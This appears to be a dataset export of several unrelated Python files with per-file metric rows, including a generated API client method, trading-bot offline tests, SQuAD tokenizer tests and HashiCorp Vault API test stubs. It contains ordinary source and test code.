def list_app_keys_with_http_info(self, app_id, **kwargs): # noqa: E501
"""List App Keys # noqa: E501
Lists all API keys for a given app. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_app_keys_with_http_info(app_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str app_id: Identifies the app. (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(AppKeyListResponse, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'app_id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method list_app_keys" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'app_id' is set
if self.api_client.client_side_validation and ('app_id' not in local_var_params or # noqa: E501
local_var_params['app_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `app_id` when calling `list_app_keys`") # noqa: E501
collection_formats = {}
path_params = {}
if 'app_id' in local_var_params:
path_params['appId'] = local_var_params['app_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth', 'bearerAuth'] # noqa: E501
return self.api_client.call_api(
'/v2/apps/{appId}/keys', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AppKeyListResponse', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
| 44.705545 | 234 | 0.589752 | 2,722 | 23,381 | 4.801249 | 0.074578 | 0.044686 | 0.064274 | 0.027546 | 0.939475 | 0.934961 | 0.930829 | 0.92356 | 0.914684 | 0.913612 | 0 | 0.015663 | 0.33647 | 23,381 | 522 | 235 | 44.791188 | 0.826737 | 0.44472 | 0 | 0.722892 | 1 | 0 | 0.177036 | 0.033313 | 0 | 0 | 0 | 0 | 0 | 1 | 0.036145 | false | 0 | 0.02008 | 0 | 0.092369 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
091abc6660de1bf2e9d0825b4d1721e249b93d7d | 189 | py | Python | src/Drawable.py | oerpli/TUD15-Snake | 00804fcc14d06bcc6e835c3182d8fdb720b34713 | [
"MIT"
] | null | null | null | src/Drawable.py | oerpli/TUD15-Snake | 00804fcc14d06bcc6e835c3182d8fdb720b34713 | [
"MIT"
] | null | null | null | src/Drawable.py | oerpli/TUD15-Snake | 00804fcc14d06bcc6e835c3182d8fdb720b34713 | [
"MIT"
] | null | null | null | class Drawable:
def __init__(self):
pass
def InitDrawer(self,drawer):
self.__drawer = drawer
def GetDrawer(self):
return self.__drawer
def Draw(self):
raise NotImplementedError | 21 | 29 | 0.751323 | 24 | 189 | 5.583333 | 0.541667 | 0.223881 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.15873 | 189 | 9 | 30 | 21 | 0.842767 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.444444 | false | 0.111111 | 0 | 0.111111 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 7 |
091b0f203bac4a89cd37cc434d3a9e7245d89bcb | 10,150 | py | Python | tests/test_offline.py | ztomsy/tribot | b5e7fb17368eb37bf5a321d0215c245e16e804e2 | [
"BSD-2-Clause"
] | 5 | 2021-03-24T15:49:10.000Z | 2021-11-08T17:21:50.000Z | tests/test_offline.py | ztomsy/tribot | b5e7fb17368eb37bf5a321d0215c245e16e804e2 | [
"BSD-2-Clause"
] | 3 | 2020-02-27T18:52:29.000Z | 2021-01-09T12:16:58.000Z | tests/test_offline.py | ztomsy/tribot | b5e7fb17368eb37bf5a321d0215c245e16e804e2 | [
"BSD-2-Clause"
] | 3 | 2020-05-12T14:11:04.000Z | 2021-08-12T00:56:41.000Z | # -*- coding: utf-8 -*-
import unittest
from subprocess import call
import tkgtri.analyzer as ta
from .context import tkgtri
# todo - tests for reports directories creation
class TriOfflineTestSuite(unittest.TestCase):
""" TriBot Cli tests"""
@staticmethod
def _run_bot_offine(cli):
"""
returns the deal loaded from the csv result file in _test/test.csv
:param cli: cli parameters for bot
:return: tkgtri.analyzer.Deal object
"""
call("python3 tribot.py {}".format(cli), shell=True)
deal = ta.Deal()
deal.load_from_csv("_test/test.csv", "test")
return deal
def test_e2e_general_mode(self):
"""
order books from ticker. result is good. start-qty should shrink to share_balance_to_bid * balance
:return:
"""
cli = "--balance 1 offline --test"
deal = self._run_bot_offine(cli)
self.assertEqual(float(deal.data_row["balance"]) * float(deal.data_row["_config_share_balance_to_bid"]),
float(deal.data_row["start-qty"]))
self.assertEqual(0.8, float(deal.data_row["start-qty"]))
self.assertEqual(0.03883667000000002, float(deal.data_row["result-fact-diff"]))
def test_e2e_general_mode_yml_config(self):
"""
order books from ticker. result is good. start-qty should shrink to share_balance_to_bid * balance
:return:
"""
cli = "--config _config_default.yml --balance 1 offline --test"
deal = self._run_bot_offine(cli)
self.assertEqual(float(deal.data_row["balance"]) * float(deal.data_row["_config_share_balance_to_bid"]),
float(deal.data_row["start-qty"]))
self.assertEqual(0.8, float(deal.data_row["start-qty"]))
self.assertEqual(0.03883667000000002, float(deal.data_row["result-fact-diff"]))
self.assertEqual("PROD1_YML", deal.data_row["server-id"])
def test_e2e_order_book_amount_less_than_max_bal(self):
"""
orderbooks from ticker. result is good.
1st leg order book depth = 2
:return:
"""
cli = "--balance 1 offline --test -ob test_data/order_books.csv"
deal = self._run_bot_offine(cli)
self.assertAlmostEqual(0.06000734789047485, float(deal.data_row["start-qty"]), 4)
self.assertEqual(0.002407822109525136, float(deal.data_row["result-fact-diff"]))
# prices from order book
self.assertNotEqual(float(deal.data_row["leg1-price"]), float(deal.data_row["leg1-ob-price"]))
def test_e2e_override_depth_amount_greater_than_from_order_book(self):
"""
in this case override_depth_amount is greater than amount from order book, so the start quantity should be taken
from override_depth_amount.
Prices should be taken from tickers
"""
cli = "--balance 1 --override_depth_amount 0.5 offline --test -ob test_data/order_books.csv "
deal = self._run_bot_offine(cli)
self.assertEqual(0.5, float(deal.data_row["_config_override_depth_amount"]), 4)
self.assertEqual(0.5, float(deal.data_row["start-qty"]))
self.assertEqual(float(deal.data_row["ob_result"]), float(deal.data_row["result"]))
self.assertEqual(0.024282400000000093, float(deal.data_row["result-fact-diff"]))
# check if prices are from tickers
self.assertEqual(float(deal.data_row["leg1-price"]), float(deal.data_row["leg1-ob-price"]))
self.assertEqual(float(deal.data_row["leg2-price"]), float(deal.data_row["leg2-ob-price"]))
self.assertEqual(float(deal.data_row["leg3-price"]), float(deal.data_row["leg3-ob-price"]))
def test_e2e_override_depth_amount_less_than_from_order_book(self):
"""
in this case override_depth_amount is less than amount from order book, so the start quantity should be taken
from order book. Results should be equal to test_e2e_order_book_amount_less_than_max_bal
Prices should be taken from order books
"""
cli = "--balance 1 --override_depth_amount 0.03 offline --test -ob test_data/order_books.csv "
deal = self._run_bot_offine(cli)
self.assertAlmostEqual(0.06000734789047485, float(deal.data_row["start-qty"]), 4)
self.assertEqual(0.002407822109525136, float(deal.data_row["result-fact-diff"]))
# prices from order book
self.assertNotEqual(float(deal.data_row["leg1-price"]), float(deal.data_row["leg1-ob-price"]))
def test_e2e_override_depth_amount_greater_than_max_allowed_from_balance(self):
"""
Case: override_depth_amount is greater than max share of balance to bid and amount from order book.
Prices should be taken from tickers
:return:
"""
cli = "--balance 0.5 --override_depth_amount 0.5 offline --test -ob test_data/order_books.csv "
deal = self._run_bot_offine(cli)
self.assertEqual(0.5*0.8, float(deal.data_row["start-qty"]))
# check if prices are from tickers
self.assertEqual(float(deal.data_row["leg1-price"]), float(deal.data_row["leg1-ob-price"]))
self.assertEqual(float(deal.data_row["leg2-price"]), float(deal.data_row["leg2-ob-price"]))
self.assertEqual(float(deal.data_row["leg3-price"]), float(deal.data_row["leg3-ob-price"]))
def test_skip_order_books_start_amount_max_from_balance(self):
cli = "--balance 1 --skip_order_books offline --test -ob test_data/order_books.csv "
deal = self._run_bot_offine(cli)
self.assertEqual(0.8, float(deal.data_row["start-qty"]))
# check if prices are from tickers
self.assertEqual(float(deal.data_row["leg1-price"]), float(deal.data_row["leg1-ob-price"]))
self.assertEqual(float(deal.data_row["leg2-price"]), float(deal.data_row["leg2-ob-price"]))
self.assertEqual(float(deal.data_row["leg3-price"]), float(deal.data_row["leg3-ob-price"]))
def test_skip_order_books_override_depth_amount(self):
cli = "--balance 1 --skip_order_books --override_depth_amount 0.5 offline --test -ob test_data/order_books.csv "
deal = self._run_bot_offine(cli)
self.assertEqual(0.5, float(deal.data_row["start-qty"]))
self.assertEqual(0.024282400000000093, float(deal.data_row["result-fact-diff"]))
# check if prices are from tickers
self.assertEqual(float(deal.data_row["leg1-price"]), float(deal.data_row["leg1-ob-price"]))
self.assertEqual(float(deal.data_row["leg2-price"]), float(deal.data_row["leg2-ob-price"]))
self.assertEqual(float(deal.data_row["leg3-price"]), float(deal.data_row["leg3-ob-price"]))
def test_skip_order_books_general(self):
cli = "--balance 1 --skip_order_books offline --test -ob test_data/order_books.csv "
deal = self._run_bot_offine(cli)
self.assertEqual(0.8, float(deal.data_row["start-qty"]))
self.assertEqual(0.03883667000000002, float(deal.data_row["result-fact-diff"]))
# check if prices are from tickers
self.assertEqual(float(deal.data_row["leg1-price"]), float(deal.data_row["leg1-ob-price"]))
self.assertEqual(float(deal.data_row["leg2-price"]), float(deal.data_row["leg2-ob-price"]))
self.assertEqual(float(deal.data_row["leg3-price"]), float(deal.data_row["leg3-ob-price"]))
def test_skip_order_books_force_start_bid(self):
cli = "--balance 1 --skip_order_books --force_start_bid 0.1 offline --test -ob test_data/order_books.csv "
deal = self._run_bot_offine(cli)
self.assertEqual(0.1, float(deal.data_row["start-qty"]))
# check if prices are from tickers
self.assertEqual(float(deal.data_row["leg1-price"]), float(deal.data_row["leg1-ob-price"]))
self.assertEqual(float(deal.data_row["leg2-price"]), float(deal.data_row["leg2-ob-price"]))
self.assertEqual(float(deal.data_row["leg3-price"]), float(deal.data_row["leg3-ob-price"]))
def test_skip_order_books_force_start_bid_and_override_depth(self):
cli = "--balance 1 --skip_order_books --force_start_bid 0.1 --override_depth_amount 0.5 offline --test -ob test_data/order_books.csv "
deal = self._run_bot_offine(cli)
self.assertEqual(0.5, float(deal.data_row["start-qty"]))
# check if prices are from tickers
self.assertEqual(float(deal.data_row["leg1-price"]), float(deal.data_row["leg1-ob-price"]))
self.assertEqual(float(deal.data_row["leg2-price"]), float(deal.data_row["leg2-ob-price"]))
self.assertEqual(float(deal.data_row["leg3-price"]), float(deal.data_row["leg3-ob-price"]))
def test_order_cancel_threshold(self):
cli = "--config _config_default_ft.json --balance 1 --skip_order_books --force_start_bid 0.1 offline --test -t test_data/tickers_threshold.csv "
deal = self._run_bot_offine(cli)
self.assertEqual(0.1, float(deal.data_row["start-qty"]))
self.assertEqual("True", deal.data_row["_config_fullthrottle"])
self.assertEqual(-0.01, float(deal.data_row["_config_cancel_price_threshold"]))
self.assertAlmostEqual(0.4, float(deal.data_row["leg1-filled"]), 4)
self.assertEqual(6, float(deal.data_row["leg1-order-updates"]))
self.assertEqual("#below_threshold", deal.data_row["leg1-tags"])
self.assertAlmostEqual(0.03774787776606954, float(deal.data_row["finish-qty"]), 6)
# check if prices are from tickers
self.assertEqual(float(deal.data_row["leg1-price"]), float(deal.data_row["leg1-ob-price"]))
self.assertEqual(float(deal.data_row["leg2-price"]), float(deal.data_row["leg2-ob-price"]))
self.assertEqual(float(deal.data_row["leg3-price"]), float(deal.data_row["leg3-ob-price"]))
"""
Test cases:
x override_depth_amount less than from Order book -> should going with the amount from order books
x override_depth_amount greater than max share of balance to bid
x skip order books
xx with override_depth_amount less than
-- with force start_amount
"""
if __name__ == '__main__':
unittest.main()
| 45.515695 | 153 | 0.680197 | 1,444 | 10,150 | 4.557479 | 0.101108 | 0.105759 | 0.145419 | 0.204224 | 0.825255 | 0.792737 | 0.772527 | 0.757028 | 0.734691 | 0.72375 | 0 | 0.03816 | 0.184138 | 10,150 | 222 | 154 | 45.720721 | 0.756551 | 0.136847 | 0 | 0.579439 | 0 | 0.018692 | 0.26263 | 0.062263 | 0 | 0 | 0 | 0.004505 | 0.523364 | 1 | 0.121495 | false | 0 | 0.037383 | 0 | 0.17757 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
093f59415ed5ef23cdc319ef5dd8d43a2cf2ecc8 | 589 | py | Python | chainer_chemistry/models/gwm/__init__.py | pfnet/chainerchem | efe323aa21f63a815130d673781e7cca1ccb72d2 | [
"MIT"
] | 184 | 2019-11-27T12:59:01.000Z | 2022-03-29T19:18:54.000Z | chainer_chemistry/models/gwm/__init__.py | pfnet/chainerchem | efe323aa21f63a815130d673781e7cca1ccb72d2 | [
"MIT"
] | 21 | 2019-12-08T01:53:33.000Z | 2020-10-23T01:19:56.000Z | chainer_chemistry/models/gwm/__init__.py | pfnet/chainerchem | efe323aa21f63a815130d673781e7cca1ccb72d2 | [
"MIT"
] | 45 | 2019-11-28T09:59:54.000Z | 2022-02-07T02:42:46.000Z | from chainer_chemistry.models.gwm import gwm # NOQA
from chainer_chemistry.models.gwm import gwm_graph_conv_model # NOQA
from chainer_chemistry.models.gwm import gwm_net # NOQA
from chainer_chemistry.models.gwm.gwm import GWM # NOQA
from chainer_chemistry.models.gwm.gwm_graph_conv_model import GWMGraphConvModel # NOQA
from chainer_chemistry.models.gwm.gwm_net import GGNN_GWM # NOQA
from chainer_chemistry.models.gwm.gwm_net import GIN_GWM # NOQA
from chainer_chemistry.models.gwm.gwm_net import NFP_GWM # NOQA
from chainer_chemistry.models.gwm.gwm_net import RSGCN_GWM # NOQA
| 53.545455 | 87 | 0.835314 | 93 | 589 | 5.032258 | 0.172043 | 0.211538 | 0.384615 | 0.5 | 0.837607 | 0.837607 | 0.837607 | 0.711538 | 0.596154 | 0.307692 | 0 | 0 | 0.108659 | 589 | 10 | 88 | 58.9 | 0.891429 | 0.074703 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 10 |
094459511af89d5c0d6d6324ee039429c3cdfd6e | 87 | py | Python | test_ci.py | SolutionUp/SolutionUP-System | 4f341df1a51a43b350e626d47abd207a55edb94d | [
"MIT"
] | 4 | 2021-08-30T01:45:46.000Z | 2022-01-08T18:05:10.000Z | test_ci.py | SolutionUp/SolutionUP-System | 4f341df1a51a43b350e626d47abd207a55edb94d | [
"MIT"
] | 6 | 2021-08-29T03:26:48.000Z | 2021-09-24T00:13:11.000Z | test_ci.py | SolutionUp/SolutionUP-System | 4f341df1a51a43b350e626d47abd207a55edb94d | [
"MIT"
] | 1 | 2021-08-16T21:21:34.000Z | 2021-08-16T21:21:34.000Z | from produtos.tests import *
from vendas.tests import *
from manutencoes.tests import * | 29 | 31 | 0.804598 | 12 | 87 | 5.833333 | 0.5 | 0.471429 | 0.428571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.126437 | 87 | 3 | 31 | 29 | 0.921053 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
094ec691ae4e25d227fa49a84db96466250a6e9f | 5,499 | py | Python | src/squad/test/test_utilities.py | nptdat/qanet | d092b5484347f2f3167d162cb56eeada5c5a109e | [
"MIT"
] | 12 | 2018-12-13T16:06:26.000Z | 2020-12-07T11:39:10.000Z | src/squad/test/test_utilities.py | nptdat/qanet | d092b5484347f2f3167d162cb56eeada5c5a109e | [
"MIT"
] | null | null | null | src/squad/test/test_utilities.py | nptdat/qanet | d092b5484347f2f3167d162cb56eeada5c5a109e | [
"MIT"
] | 2 | 2019-01-10T08:42:16.000Z | 2020-08-12T07:32:20.000Z | import unittest
from utilities import prune_word_vectors, to_chars, tokenize, augment_long_text, tokenize_long_text
from config import Config as cf
class TestUtilities(unittest.TestCase):
def test_load_glove(self):
pass
def test_prune_word_vectors(self):
vocab = set({'I', 'go', 'to', 'school'})
wv = {
'I': [0, 0],
'You': [0, 0],
'to': [0, 0]
}
pruned_wv = prune_word_vectors(wv, vocab)
self.assertEqual(sorted(list(pruned_wv.keys())), ['I', 'to'])
def test_to_chars(self):
chars = to_chars(['I', 'go', 'to', 'schools'], 3, cf.PAD_CHAR)
self.assertEqual(chars, [
['I', '', ''],
['g', 'o', ''],
['t', 'o', ''],
['s', 'c', 'h']
])
def test_tokenize(self):
self.assertEqual(tokenize("What is the title of his first commercially successful work?"), ['What', 'is', 'the', 'title', 'of', 'his', 'first', 'commercially', 'successful', 'work', '?'])
self.assertEqual(tokenize("Rondo Op. 1."), ['Rondo', 'Op', '.', '1', '.'])
def test_augment_long_text(self):
context = 'Although the film received negative reviews from critics, the movie did well at the US box office, grossing $68 million—$60 million more than Cadillac Records—on a budget of $20 million. The fight scene finale between Sharon and the character played by Ali Larter also won the 2010 MTV Movie Award for Best Fight.'
answers = [
{
'text': '60 million',
'answer_start': 121
},
{
'text': 'MTV Movie Award for Best Fight',
'answer_start': 282
}
]
result = augment_long_text(context, answers)
self.assertEqual(result, 'Although the film received negative reviews from critics, the movie did well at the US box office, grossing $68 million—$ 60 million more than Cadillac Records—on a budget of $20 million. The fight scene finale between Sharon and the character played by Ali Larter also won the 2010 MTV Movie Award for Best Fight.')
def test_tokenize_long_text(self):
self.assertEqual(tokenize_long_text('aaa [n 3] abc def [web 1] xyz[n 15]'), ['aaa', '[', 'n', '3', ']', 'abc', 'def', '[', 'web', '1', ']', 'xyz', '[', 'n', '15', ']'])
self.assertEqual(tokenize_long_text("From September 1823 to 1826 Chopin attended the Warsaw Lyceum, where he received organ lessons from the Czech musician Wilhelm W\u00fcrfel during his first year. In the autumn of 1826 he began a three-year course under the Silesian composer J\u00f3zef Elsner at the Warsaw Conservatory, studying music theory, figured bass and composition.[n 3] Throughout this period he continued to compose and to give recitals in concerts and salons in Warsaw. He was engaged by the inventors of a mechanical organ, the \"eolomelodicon\", and on this instrument in May 1825 he performed his own improvisation and part of a concerto by Moscheles. The success of this concert led to an invitation to give a similar recital on the instrument before Tsar Alexander I, who was visiting Warsaw; the Tsar presented him with a diamond ring. At a subsequent eolomelodicon concert on 10 June 1825, Chopin performed his Rondo Op. 1. This was the first of his works to be commercially published and earned him his first mention in the foreign press, when the Leipzig Allgemeine Musikalische Zeitung praised his \"wealth of musical ideas\"."), ['From', 'September', '1823', 'to', '1826', 'Chopin', 'attended', 'the', 'Warsaw', 'Lyceum', ',', 'where', 'he', 'received', 'organ', 'lessons', 'from', 'the', 'Czech', 'musician', 'Wilhelm', 'Würfel', 'during', 'his', 'first', 'year', '.', 'In', 'the', 'autumn', 'of', '1826', 'he', 'began', 'a', 'three', '-', 'year', 'course', 'under', 'the', 'Silesian', 'composer', 'Józef', 'Elsner', 'at', 'the', 'Warsaw', 'Conservatory', ',', 'studying', 'music', 'theory', ',', 'figured', 'bass', 'and', 'composition', '.', '[', 'n', '3', ']', 'Throughout', 'this', 'period', 'he', 'continued', 'to', 'compose', 'and', 'to', 'give', 'recitals', 'in', 'concerts', 'and', 'salons', 'in', 'Warsaw', '.', 'He', 'was', 'engaged', 'by', 'the', 'inventors', 'of', 'a', 'mechanical', 'organ', ',', 'the', '"', 'eolomelodicon', '"', ',', 'and', 'on', 'this', 'instrument', 'in', 'May', '1825', 'he', 'performed', 'his', 'own', 'improvisation', 'and', 'part', 'of', 'a', 'concerto', 'by', 'Moscheles', '.', 'The', 'success', 'of', 'this', 'concert', 'led', 'to', 'an', 'invitation', 'to', 'give', 'a', 'similar', 'recital', 'on', 'the', 'instrument', 'before', 'Tsar', 'Alexander', 'I', ',', 'who', 'was', 'visiting', 'Warsaw', ';', 'the', 'Tsar', 'presented', 'him', 'with', 'a', 'diamond', 'ring', '.', 'At', 'a', 'subsequent', 'eolomelodicon', 'concert', 'on', '10', 'June', '1825', ',', 'Chopin', 'performed', 'his', 'Rondo', 'Op', '.', '1', '.', 'This', 'was', 'the', 'first', 'of', 'his', 'works', 'to', 'be', 'commercially', 'published', 'and', 'earned', 'him', 'his', 'first', 'mention', 'in', 'the', 'foreign', 'press', ',', 'when', 'the', 'Leipzig', 'Allgemeine', 'Musikalische', 'Zeitung', 'praised', 'his', '"', 'wealth', 'of', 'musical', 'ideas', '"', '.'])
self.assertEqual(tokenize_long_text('The GameCube version was released worldwide in December 2006.[b]'), ['The', 'GameCube', 'version', 'was', 'released', 'worldwide', 'in', 'December', '2006', '.', '[', 'b', ']'])
| 101.833333 | 2,913 | 0.607747 | 712 | 5,499 | 4.647472 | 0.311798 | 0.019341 | 0.024176 | 0.014506 | 0.797824 | 0.769719 | 0.762164 | 0.762164 | 0.762164 | 0.762164 | 0 | 0.023895 | 0.193308 | 5,499 | 53 | 2,914 | 103.754717 | 0.721145 | 0 | 0 | 0 | 0 | 0.090909 | 0.553373 | 0 | 0 | 0 | 0 | 0 | 0.181818 | 1 | 0.136364 | false | 0.022727 | 0.068182 | 0 | 0.227273 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
117a60e8e82e7a7438ccd9bb3bfed8e7b70e9f1a | 110 | py | Python | test/__init__.py | jmarrec/IDFVersionUpdater2 | 0420732141e41bdc06c85f1372d82f0843f8cebf | [
"BSD-3-Clause"
] | null | null | null | test/__init__.py | jmarrec/IDFVersionUpdater2 | 0420732141e41bdc06c85f1372d82f0843f8cebf | [
"BSD-3-Clause"
] | null | null | null | test/__init__.py | jmarrec/IDFVersionUpdater2 | 0420732141e41bdc06c85f1372d82f0843f8cebf | [
"BSD-3-Clause"
] | 2 | 2020-09-25T08:02:39.000Z | 2021-08-18T08:30:31.000Z | from test_EnergyPlusPath import *
from test_TransitionBinary import *
from test_VersionUpdaterWindow import *
| 27.5 | 39 | 0.863636 | 12 | 110 | 7.666667 | 0.5 | 0.26087 | 0.304348 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.109091 | 110 | 3 | 40 | 36.666667 | 0.938776 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
11946451f8983015037cf5f2e67962678e2acd67 | 34,530 | py | Python | hashicorp_vault_client/test/test_system_api.py | drewmullen/HAC | fb185804fd244366f8f8d01df22835b3d96e7512 | [
"Apache-2.0"
] | null | null | null | hashicorp_vault_client/test/test_system_api.py | drewmullen/HAC | fb185804fd244366f8f8d01df22835b3d96e7512 | [
"Apache-2.0"
] | 2 | 2019-09-30T20:56:41.000Z | 2019-10-02T00:22:07.000Z | hashicorp_vault_client/test/test_system_api.py | drewmullen/HAC | fb185804fd244366f8f8d01df22835b3d96e7512 | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
"""
HashiCorp Vault API
HTTP API that gives you full access to Vault. All API routes are prefixed with `/v1/`. # noqa: E501
OpenAPI spec version: 1.2.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import hashicorp_vault_client
from api.system_api import SystemApi # noqa: E501
from hashicorp_vault_client.rest import ApiException
class TestSystemApi(unittest.TestCase):
"""SystemApi unit test stubs"""
def setUp(self):
self.api = api.system_api.SystemApi() # noqa: E501
def tearDown(self):
pass
def test_delete_sys_audit_path(self):
"""Test case for delete_sys_audit_path
Disable the audit device at the given path. # noqa: E501
"""
pass
def test_delete_sys_auth_path(self):
"""Test case for delete_sys_auth_path
Disable the auth method at the given auth path # noqa: E501
"""
pass
def test_delete_sys_config_auditing_request_headers_header(self):
"""Test case for delete_sys_config_auditing_request_headers_header
Disable auditing of the given request header. # noqa: E501
"""
pass
def test_delete_sys_config_control_group(self):
"""Test case for delete_sys_config_control_group
Configure control group global settings. # noqa: E501
"""
pass
def test_delete_sys_config_cors(self):
"""Test case for delete_sys_config_cors
Remove any CORS settings. # noqa: E501
"""
pass
def test_delete_sys_config_ui_headers_header(self):
"""Test case for delete_sys_config_ui_headers_header
Remove a UI header. # noqa: E501
"""
pass
def test_delete_sys_generate_root(self):
"""Test case for delete_sys_generate_root
Cancels any in-progress root generation attempt. # noqa: E501
"""
pass
def test_delete_sys_generate_root_attempt(self):
"""Test case for delete_sys_generate_root_attempt
Cancels any in-progress root generation attempt. # noqa: E501
"""
pass
def test_delete_sys_mfa_method_duo_name(self):
"""Test case for delete_sys_mfa_method_duo_name
Defines or updates a Duo MFA method. # noqa: E501
"""
pass
def test_delete_sys_mfa_method_okta_name(self):
"""Test case for delete_sys_mfa_method_okta_name
Defines or updates an Okta MFA method. # noqa: E501
"""
pass
def test_delete_sys_mfa_method_pingid_name(self):
"""Test case for delete_sys_mfa_method_pingid_name
Defines or updates a PingID MFA method. # noqa: E501
"""
pass
def test_delete_sys_mfa_method_totp_name(self):
"""Test case for delete_sys_mfa_method_totp_name
Defines or updates a TOTP MFA method. # noqa: E501
"""
pass
def test_delete_sys_mounts_path(self):
"""Test case for delete_sys_mounts_path
Disable the mount point specified at the given path. # noqa: E501
"""
pass
def test_delete_sys_namespaces_path(self):
"""Test case for delete_sys_namespaces_path
"""
pass
def test_delete_sys_plugins_catalog_name(self):
"""Test case for delete_sys_plugins_catalog_name
Remove the plugin with the given name. # noqa: E501
"""
pass
def test_delete_sys_plugins_catalog_type_name(self):
"""Test case for delete_sys_plugins_catalog_type_name
Remove the plugin with the given name. # noqa: E501
"""
pass
def test_delete_sys_policies_acl_name(self):
"""Test case for delete_sys_policies_acl_name
Delete the ACL policy with the given name. # noqa: E501
"""
pass
def test_delete_sys_policies_egp_name(self):
"""Test case for delete_sys_policies_egp_name
Read, Modify, or Delete an access control policy. # noqa: E501
"""
pass
def test_delete_sys_policies_rgp_name(self):
"""Test case for delete_sys_policies_rgp_name
Read, Modify, or Delete an access control policy. # noqa: E501
"""
pass
def test_delete_sys_policy_name(self):
"""Test case for delete_sys_policy_name
Delete the policy with the given name. # noqa: E501
"""
pass
def test_delete_sys_rekey_backup(self):
"""Test case for delete_sys_rekey_backup
Delete the backup copy of PGP-encrypted unseal keys. # noqa: E501
"""
pass
def test_delete_sys_rekey_init(self):
"""Test case for delete_sys_rekey_init
Cancels any in-progress rekey. # noqa: E501
"""
pass
def test_delete_sys_rekey_recovery_key_backup(self):
"""Test case for delete_sys_rekey_recovery_key_backup
Allows fetching or deleting the backup of the rotated unseal keys. # noqa: E501
"""
pass
def test_delete_sys_rekey_verify(self):
"""Test case for delete_sys_rekey_verify
Cancel any in-progress rekey verification operation. # noqa: E501
"""
pass
def test_delete_sys_replication_performance_primary_mount_filter_id(self):
"""Test case for delete_sys_replication_performance_primary_mount_filter_id
"""
pass
def test_get_sys_audit(self):
"""Test case for get_sys_audit
List the enabled audit devices. # noqa: E501
"""
pass
def test_get_sys_auth(self):
"""Test case for get_sys_auth
List the currently enabled credential backends. # noqa: E501
"""
pass
